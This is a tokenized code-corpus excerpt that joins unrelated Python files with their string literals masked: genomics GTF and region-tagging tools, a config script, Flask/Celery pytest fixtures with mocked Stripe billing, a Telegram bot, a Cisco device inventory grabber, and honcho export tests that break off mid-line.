<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from ngsutils . support import gzip_reader <EOL> def gtf_add_isoform ( gtf , iso , out = sys . stdout , quiet = False ) : <EOL> isoforms = { } <EOL> if not quiet : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> for line in gzip_reader ( iso ) : <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> continue <EOL> cols = line . rstrip ( ) . split ( '<STR_LIT:\t>' ) <EOL> isoforms [ cols [ <NUM_LIT:1> ] ] = cols [ <NUM_LIT:0> ] <EOL> if not quiet : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> for line in gzip_reader ( gtf ) : <EOL> try : <EOL> comment = None <EOL> idx = line . find ( '<STR_LIT:#>' ) <EOL> if idx > - <NUM_LIT:1> : <EOL> if idx == <NUM_LIT:0> : <EOL> sys . stdout . write ( line ) <EOL> continue <EOL> comment = line [ idx : ] <EOL> line = line [ : - idx ] <EOL> chrom , source , feature , start , end , score , strand , frame , attrs = line . rstrip ( ) . split ( '<STR_LIT:\t>' ) <EOL> transcript_id = None <EOL> for key , val in [ x . split ( '<STR_LIT:U+0020>' ) for x in [ x . strip ( ) for x in attrs . split ( '<STR_LIT:;>' ) ] if x ] : <EOL> if val [ <NUM_LIT:0> ] == '<STR_LIT:">' and val [ - <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> val = val [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if key == '<STR_LIT>' : <EOL> transcript_id = val <EOL> if attrs [ - <NUM_LIT:1> ] != '<STR_LIT:;>' : <EOL> attrs = '<STR_LIT>' % attrs <EOL> if transcript_id in isoforms : <EOL> attrs = '<STR_LIT>' % ( attrs , isoforms [ transcript_id ] ) <EOL> out . write ( '<STR_LIT:\t>' . join ( [ chrom , source , feature , start , end , score , strand , frame , attrs ] ) ) <EOL> if comment : <EOL> out . write ( '<STR_LIT>' % comment ) <EOL> out . write ( '<STR_LIT:\n>' ) <EOL> except : <EOL> import traceback <EOL> sys . stderr . write ( '<STR_LIT>' % line ) <EOL> traceback . print_exc ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def usage ( msg = None ) : <EOL> if msg : <EOL> print msg <EOL> print __doc__ <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> gtf = None <EOL> iso = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not gtf and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> gtf = arg <EOL> elif not iso and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> iso = arg <EOL> if not gtf or not iso : <EOL> usage ( ) <EOL> if gtf == '<STR_LIT:->' and iso == '<STR_LIT:->' : <EOL> usage ( '<STR_LIT>' ) <EOL> gtf_add_isoform ( gtf , iso ) </s>
<s> class RangeMatch ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , name ) : <EOL> self . ranges = { } <EOL> self . name = name <EOL> def add_range ( self , chrom , strand , start , end ) : <EOL> if not chrom in self . ranges : <EOL> self . ranges [ chrom ] = { } <EOL> bin = start / <NUM_LIT> <EOL> if not bin in self . ranges [ chrom ] : <EOL> self . ranges [ chrom ] [ bin ] = [ ] <EOL> self . ranges [ chrom ] [ bin ] . insert ( <NUM_LIT:0> , ( start , end , strand ) ) <EOL> if ( end / <NUM_LIT> ) != bin : <EOL> for bin in xrange ( bin + <NUM_LIT:1> , ( end / <NUM_LIT> ) + <NUM_LIT:1> ) : <EOL> if not bin in self . ranges [ chrom ] : <EOL> self . ranges [ chrom ] [ bin ] = [ ] <EOL> self . ranges [ chrom ] [ bin ] . insert ( <NUM_LIT:0> , ( start , end , strand ) ) <EOL> def get_tag ( self , chrom , strand , pos , ignore_strand = False ) : <EOL> '''<STR_LIT>''' <EOL> if not chrom in self . ranges : <EOL> return None , False <EOL> bin = pos / <NUM_LIT> <EOL> if not bin in self . ranges [ chrom ] : <EOL> return None , False <EOL> for start , end , r_strand in self . ranges [ chrom ] [ bin ] : <EOL> if pos >= start and pos <= end : <EOL> if ignore_strand or strand == r_strand : <EOL> return self . name , False <EOL> return self . name , True <EOL> return None , False <EOL> class RegionTagger ( object ) : <EOL> def __init__ ( self , gtf , valid_chroms = None , only_first_fragment = True ) : <EOL> self . regions = [ ] <EOL> self . counts = { } <EOL> self . only_first_fragment = only_first_fragment <EOL> coding = RangeMatch ( '<STR_LIT>' ) <EOL> exons = RangeMatch ( '<STR_LIT>' ) <EOL> utr_5 = RangeMatch ( '<STR_LIT>' ) <EOL> utr_3 = RangeMatch ( '<STR_LIT>' ) <EOL> introns = RangeMatch ( '<STR_LIT>' ) <EOL> promoters = RangeMatch ( '<STR_LIT>' ) <EOL> for gene in gtf . genes : <EOL> if valid_chroms and not gene . chrom in valid_chroms : <EOL> continue <EOL> if gene . strand == '<STR_LIT:+>' : <EOL> promoters . add_range ( gene . chrom , gene . strand , gene . start - <NUM_LIT> , gene . start ) <EOL> else : <EOL> promoters . add_range ( gene . chrom , gene . strand , gene . end , gene . end + <NUM_LIT> ) <EOL> for transcript in gene . transcripts : <EOL> if transcript . has_cds : <EOL> for start , end in transcript . cds : <EOL> coding . add_range ( gene . chrom , gene . strand , start , end ) <EOL> for s , e in transcript . utr_5 : <EOL> utr_5 . add_range ( gene . chrom , gene . strand , s , e ) <EOL> for s , e in transcript . utr_3 : <EOL> utr_3 . add_range ( gene . chrom , gene . strand , s , e ) <EOL> last_end = None <EOL> for start , end in transcript . exons : <EOL> if last_end : <EOL> introns . add_range ( gene . chrom , gene . strand , last_end , start ) <EOL> exons . add_range ( gene . chrom , gene . strand , start , end ) <EOL> last_end = end <EOL> self . regions . append ( coding ) <EOL> self . regions . append ( utr_5 ) <EOL> self . regions . append ( utr_3 ) <EOL> self . regions . append ( exons ) <EOL> self . regions . append ( introns ) <EOL> self . regions . append ( promoters ) <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def add_read ( self , read , chrom ) : <EOL> if read . is_unmapped : <EOL> return <EOL> if self . only_first_fragment and read . is_paired and not read . is_read1 : <EOL> return <EOL> tag = None <EOL> is_rev = False <EOL> strand = '<STR_LIT:->' if read . is_reverse else '<STR_LIT:+>' <EOL> if chrom == '<STR_LIT>' : <EOL> tag = '<STR_LIT>' <EOL> if not tag : <EOL> for op , length in read . cigar : <EOL> if op == <NUM_LIT:3> : <EOL> tag = '<STR_LIT>' <EOL> break <EOL> if not tag : <EOL> for region in self . regions : <EOL> tag , is_rev = region . get_tag ( chrom , strand , read . pos ) <EOL> if tag : <EOL> break <EOL> if not tag : <EOL> tag = '<STR_LIT>' <EOL> if tag : <EOL> if is_rev : <EOL> self . counts [ '<STR_LIT>' % tag ] += <NUM_LIT:1> <EOL> else : <EOL> self . counts [ tag ] += <NUM_LIT:1> <EOL> return tag <EOL> def tag_region ( self , chrom , start , end , strand ) : <EOL> tag = None <EOL> is_rev = False <EOL> if chrom == '<STR_LIT>' or chrom == '<STR_LIT:M>' : <EOL> tag = '<STR_LIT>' <EOL> if not tag : <EOL> for region in self . regions : <EOL> tag , is_rev = region . get_tag ( chrom , strand , start ) <EOL> if is_rev : <EOL> tag = '<STR_LIT>' % tag <EOL> if start != end : <EOL> endtag , is_rev = region . get_tag ( chrom , strand , end ) <EOL> if is_rev : <EOL> endtag = '<STR_LIT>' % endtag <EOL> if tag and endtag and endtag != tag : <EOL> tag = '<STR_LIT>' % ( tag , endtag ) <EOL> if not tag : <EOL> tag = '<STR_LIT>' </s>
<s> import os <EOL> import argparse <EOL> from configparser import ConfigParser <EOL> from mpdc . libs . utils import info , warning <EOL> def configure ( args ) : <EOL> if args . switch : <EOL> change_default_profile ( args . switch ) <EOL> return <EOL> config = ConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT:localhost>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> print ( '<STR_LIT:\n>' ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> while True : <EOL> path = input ( '<STR_LIT>' ) <EOL> if os . path . isfile ( path ) : <EOL> break <EOL> warning ( '<STR_LIT>' + path ) <EOL> print ( '<STR_LIT:\n>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = path <EOL> colors = input ( '<STR_LIT>' ) . lower ( ) or '<STR_LIT:y>' <EOL> if colors == '<STR_LIT:y>' : <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> print ( '<STR_LIT:\n>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> filepath = os . path . expanduser ( '<STR_LIT>' ) <EOL> try : <EOL> with open ( filepath , '<STR_LIT:w>' ) as configfile : <EOL> config . write ( configfile ) <EOL> info ( '<STR_LIT>' + filepath ) <EOL> except IOError : <EOL> warning ( '<STR_LIT>' + filepath ) <EOL> def change_default_profile ( profile ) : <EOL> config = ConfigParser ( ) <EOL> filepath = os . path . expanduser ( '<STR_LIT>' ) <EOL> if not config . read ( filepath ) : <EOL> warning ( '<STR_LIT>' ) <EOL> return <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] = str ( profile ) <EOL> try : <EOL> with open ( filepath , '<STR_LIT:w>' ) as configfile : <EOL> config . write ( configfile ) <EOL> info ( '<STR_LIT>' + filepath ) <EOL> except IOError : <EOL> warning ( '<STR_LIT>' + filepath ) <EOL> def main ( ) : <EOL> argparser = argparse . ArgumentParser ( add_help = False ) <EOL> argparser . set_defaults ( func = configure ) <EOL> argparser . add_argument ( '<STR_LIT>' , type = int , action = '<STR_LIT:store>' ) <EOL> args = argparser . parse_args ( ) <EOL> args . func ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import catwatch . lib . logger </s>
<s> from catwatch . app import create_celery_app <EOL> celery = create_celery_app ( ) <EOL> @ celery . task ( rate_limit = '<STR_LIT>' ) <EOL> def broadcast_message ( internal_url , data ) : <EOL> """<STR_LIT>""" <EOL> from catwatch . blueprints . stream . broadcast import Broadcast <EOL> Broadcast . send_to_websocket_server ( internal_url , data ) </s>
<s> import datetime <EOL> import pytest <EOL> import pytz <EOL> from mock import Mock <EOL> from config import settings <EOL> from catwatch . app import create_app <EOL> from catwatch . lib . util_datetime import timedelta_months <EOL> from catwatch . extensions import db as _db <EOL> from catwatch . blueprints . user . models import User <EOL> from catwatch . blueprints . issue . models import Issue <EOL> from catwatch . blueprints . billing . models . credit_card import CreditCard <EOL> from catwatch . blueprints . billing . models . coupon import Coupon <EOL> from catwatch . blueprints . billing . models . subscription import Subscription <EOL> from catwatch . blueprints . billing . gateways . stripecom import Coupon as PaymentCoupon <EOL> from catwatch . blueprints . billing . gateways . stripecom import Event as PaymentEvent <EOL> from catwatch . blueprints . billing . gateways . stripecom import Card as PaymentCard <EOL> from catwatch . blueprints . billing . gateways . stripecom import Subscription as PaymentSubscription <EOL> from catwatch . blueprints . billing . gateways . stripecom import Invoice as PaymentInvoice <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def app ( ) : <EOL> """<STR_LIT>""" <EOL> db_uri = '<STR_LIT>' . format ( settings . SQLALCHEMY_DATABASE_URI ) <EOL> params = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : db_uri <EOL> } <EOL> _app = create_app ( settings_override = params ) <EOL> ctx = _app . app_context ( ) <EOL> ctx . push ( ) <EOL> yield _app <EOL> ctx . pop ( ) <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def client ( app ) : <EOL> """<STR_LIT>""" <EOL> yield app . test_client ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def db ( app ) : <EOL> """<STR_LIT>""" <EOL> _db . drop_all ( ) <EOL> _db . create_all ( ) <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' <EOL> } <EOL> admin = User ( ** params ) <EOL> _db . session . add ( admin ) <EOL> _db . session . commit ( ) <EOL> return _db <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def session ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . begin_nested ( ) <EOL> yield db . session <EOL> db . session . rollback ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def token ( db ) : <EOL> """<STR_LIT>""" <EOL> user = User . find_by_identity ( '<STR_LIT>' ) <EOL> return user . serialize_token ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def users ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( User ) . delete ( ) <EOL> users = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' <EOL> } <EOL> ] <EOL> for user in users : <EOL> db . session . add ( User ( ** user ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def issues ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( Issue ) . delete ( ) <EOL> issues = [ <EOL> { <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> for issue in issues : <EOL> db . session . add ( Issue ( ** issue ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def credit_cards ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( CreditCard ) . delete ( ) <EOL> may_29_2015 = datetime . date ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:5> , <NUM_LIT> ) <EOL> june_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> june_29_2015 = pytz . utc . localize ( june_29_2015 ) <EOL> credit_cards = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : june_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : timedelta_months ( <NUM_LIT:12> , may_29_2015 ) <EOL> } <EOL> ] <EOL> for card in credit_cards : <EOL> db . session . add ( CreditCard ( ** card ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def coupons ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( Coupon ) . delete ( ) <EOL> may_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> may_29_2015 = pytz . utc . localize ( may_29_2015 ) <EOL> june_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT> ) <EOL> june_29_2015 = pytz . utc . localize ( june_29_2015 ) <EOL> coupons = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : may_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : june_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } <EOL> ] <EOL> for coupon in coupons : <EOL> db . session . add ( Coupon ( ** coupon ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def subscriptions ( db ) : <EOL> """<STR_LIT>""" <EOL> subscriber = User . find_by_identity ( '<STR_LIT>' ) <EOL> if subscriber : <EOL> subscriber . delete ( ) <EOL> db . session . query ( Subscription ) . delete ( ) <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> admin = User ( ** params ) <EOL> db . session . add ( admin ) <EOL> db . session . commit ( ) <EOL> params = { <EOL> '<STR_LIT>' : admin . id , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> subscription = Subscription ( ** params ) <EOL> db . session . add ( subscription ) <EOL> params = { <EOL> '<STR_LIT>' : admin . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT:0> <NUM_LIT:1> ) <EOL> } <EOL> credit_card = CreditCard ( ** params ) <EOL> db . session . add ( credit_card ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def mock_stripe ( ) : <EOL> """<STR_LIT>""" <EOL> PaymentCoupon . create = Mock ( return_value = { } ) <EOL> PaymentCoupon . delete = Mock ( return_value = { } ) <EOL> PaymentEvent . retrieve = Mock ( return_value = { } ) <EOL> PaymentCard . update = Mock ( return_value = { } ) <EOL> PaymentSubscription . create = Mock ( return_value = { } ) <EOL> PaymentSubscription . update = Mock ( return_value = { } ) <EOL> PaymentSubscription . cancel = Mock ( return_value = { } ) <EOL> upcoming_api = { <EOL> '<STR_LIT:date>' : <NUM_LIT> , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:data>' : [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : <NUM_LIT> , <EOL> '<STR_LIT:end>' : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:description>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> } <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:object>' : '<STR_LIT:list>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:description>' : None , <EOL> '<STR_LIT>' : None <EOL> } <EOL> PaymentInvoice . upcoming = Mock ( return_value = upcoming_api ) </s>
<s> import sys <EOL> import telepot <EOL> from telepot . delegate import per_chat_id , create_open <EOL> """<STR_LIT>""" <EOL> class MessageCounter ( telepot . helper . ChatHandler ) : <EOL> def __init__ ( self , seed_tuple , timeout ) : <EOL> super ( MessageCounter , self ) . __init__ ( seed_tuple , timeout ) <EOL> self . _count = <NUM_LIT:0> <EOL> def on_chat_message ( self , msg ) : <EOL> self . _count += <NUM_LIT:1> <EOL> self . sender . sendMessage ( self . _count ) <EOL> TOKEN = sys . argv [ <NUM_LIT:1> ] <EOL> bot = telepot . DelegatorBot ( TOKEN , [ <EOL> ( per_chat_id ( ) , create_open ( MessageCounter , timeout = <NUM_LIT:10> ) ) , <EOL> ] ) <EOL> bot . message_loop ( run_forever = True ) </s>
<s> import threading <EOL> import time <EOL> import datetime <EOL> import re <EOL> import os <EOL> import ciscolib <EOL> PASSWORD = '<STR_LIT>' <EOL> USERNAME = '<STR_LIT>' <EOL> USER_PASSWORD = '<STR_LIT>' <EOL> models = [ ] <EOL> models_lock = threading . Lock ( ) <EOL> class Grabber ( threading . Thread ) : <EOL> def __init__ ( self , host ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . host = host <EOL> def run ( self ) : <EOL> try : <EOL> device = ciscolib . Device ( self . host , PASSWORD ) <EOL> device . connect ( ) <EOL> except ciscolib . AuthenticationError : <EOL> try : <EOL> device = ciscolib . Device ( self . host , USER_PASSWORD , USERNAME ) <EOL> device . connect ( ) <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> try : <EOL> model = device . get_model ( ) <EOL> except ciscolib . ModelNotSupported : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> if model in models : <EOL> return <EOL> else : <EOL> with models_lock : <EOL> models . append ( model ) <EOL> output_dir = '<STR_LIT>' % model <EOL> try : <EOL> os . mkdir ( output_dir ) <EOL> except OSError as e : <EOL> if e . errno != <NUM_LIT> : <EOL> print ( "<STR_LIT>" % output_dir ) <EOL> return <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> mac_data = '<STR_LIT>' <EOL> mac_cmd = '<STR_LIT>' <EOL> try : <EOL> mac_cmd = '<STR_LIT>' <EOL> mac_data = device . cmd ( mac_cmd ) <EOL> except ciscolib . InvalidCommand : <EOL> try : <EOL> mac_cmd = '<STR_LIT>' <EOL> mac_data = device . cmd ( mac_cmd ) <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> if mac_data != '<STR_LIT>' : <EOL> open ( output_dir + mac_cmd . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( mac_data ) <EOL> interfaces_re = "<STR_LIT>" <EOL> interfaces = device . cmd ( "<STR_LIT>" ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( interfaces ) <EOL> for result in re . findall ( interfaces_re , interfaces ) : <EOL> filename = "<STR_LIT>" % result <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:+>" ) <EOL> open ( output_dir + filename , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" % result ) ) <EOL> grabber_pool = [ ] <EOL> for ip in open ( '<STR_LIT>' ) : <EOL> print ( "<STR_LIT>" % ip ) <EOL> t = Grabber ( ip ) <EOL> t . start ( ) <EOL> grabber_pool . append ( t ) <EOL> while len ( grabber_pool ) >= <NUM_LIT:20> : <EOL> [ grabber_pool . remove ( thread ) for thread in grabber_pool if not thread . is_alive ( ) ] <EOL> time . sleep ( <NUM_LIT> ) <EOL> while len ( grabber_pool ) > <NUM_LIT:0> : <EOL> [ grabber_pool . remove ( thread ) for thread in grabber_pool if not thread . is_alive ( ) ] <EOL> time . sleep ( <NUM_LIT> ) <EOL> print ( "<STR_LIT>" % str ( models ) ) </s>
<s> from settings import INSTALLED_APPS <EOL> DEBUG = False <EOL> DATABASE_ENGINE = '<STR_LIT>' <EOL> DATABASE_NAME = '<STR_LIT>' <EOL> DATABASE_USER = '<STR_LIT>' <EOL> DATABASE_PASSWORD = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> INSTALLED_APPS += ( '<STR_LIT>' , ) </s>
<s> import os <EOL> import pytest <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] , indirect = True ) <EOL> def test_export_supervisord ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> expected = testenv . path ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ret == <NUM_LIT:0> <EOL> assert os . path . exists ( expected ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] , indirect = True ) <EOL> def test_export_upstart ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> assert ret == <NUM_LIT:0> <EOL> for filename in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> expected = testenv . path ( '<STR_LIT>' , filename ) <EOL> assert os . path . exists ( expected ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : """<STR_LIT>""" <EOL> } ] , indirect = True ) <EOL> def test_export_upstart_environment ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT:test>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> assert ret == 